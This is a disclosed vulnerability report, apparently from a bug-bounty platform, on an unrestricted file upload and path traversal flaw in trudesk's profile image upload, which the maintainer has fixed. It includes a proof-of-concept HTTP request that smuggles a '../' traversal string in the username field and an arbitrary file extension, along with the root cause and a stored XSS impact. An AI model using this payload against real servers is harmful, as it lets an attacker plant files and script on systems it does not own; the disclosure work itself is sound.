Unrestricted File Upload and Path Traversal in upload image in polonel/trudesk

Valid

Reported on

May 12th 2022


Description

The uploadImage function in accountsController takes both the file path and the file extension from user-controlled input. An attacker can change the path and the extension to upload a dangerous file anywhere on the server.

Proof of Concept

1. Log in
2. Upload a profile image
3. Capture the request and modify `username` and `filename`:
POST /accounts/uploadImage HTTP/1.1
Host: 192.168.20.132:8118
Content-Length: 452
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryQXoDBooqQ26crHR0
Origin: http://192.168.20.132:8118
Referer: http://192.168.20.132:8118/accounts
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: connect.sid=s%3A01nLIvLiz-oEhbSpekE9nwUSl9R_PQF1.GeCCIcToZnO%2BDlTis77aXBlVGyVOaQDURoUrIcrXQ%2BM; $trudesk%3Atimezone=America/New_York
Connection: close

------WebKitFormBoundaryQXoDBooqQ26crHR0
Content-Disposition: form-data; name="username"

/../../../../../../testpathtravesal1
------WebKitFormBoundaryQXoDBooqQ26crHR0
Content-Disposition: form-data; name="_id"

627ce4cd7778b2c5b5f49851
------WebKitFormBoundaryQXoDBooqQ26crHR0
Content-Disposition: form-data; name="image"; filename="filename.anything"
Content-Type: image/jpeg

<image content>
------WebKitFormBoundaryQXoDBooqQ26crHR0--


Impact

An authenticated user can upload a dangerous file anywhere on the server (for example, uploading a file with an .html extension leads to stored XSS).

Occurrences

This function passes object.username into path.join(), which leads to path traversal, and takes the extension from path.extname(filename), which allows uploading a file with a dangerous type.

We are processing your report and will contact the polonel/trudesk team within 24 hours. 2 months ago
tienpa99 modified the report
2 months ago
tienpa99 modified the report
2 months ago
We have contacted a member of the polonel/trudesk team and are waiting to hear back 2 months ago
polonel/trudesk maintainer has acknowledged this report 2 months ago
tienpa99
a month ago

Researcher


Hi, I see you have read the report. Is it hard to understand, or is the PoC not working?

Chris Brame assigned a CVE to this report a month ago
Chris Brame validated this vulnerability a month ago
tienpa99 has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Chris Brame
a month ago

Maintainer


This has been fixed in v1.2.2. I will update this report once it has been released.

tienpa99
a month ago

Researcher


Sure. Just update here, I will recheck this issue.

We have sent a fix follow up to the polonel/trudesk team. We will try again in 7 days. a month ago
Chris Brame confirmed that a fix has been merged on d107f1 a month ago
Chris Brame has been awarded the fix bounty
accounts.js#L485-L505 has been validated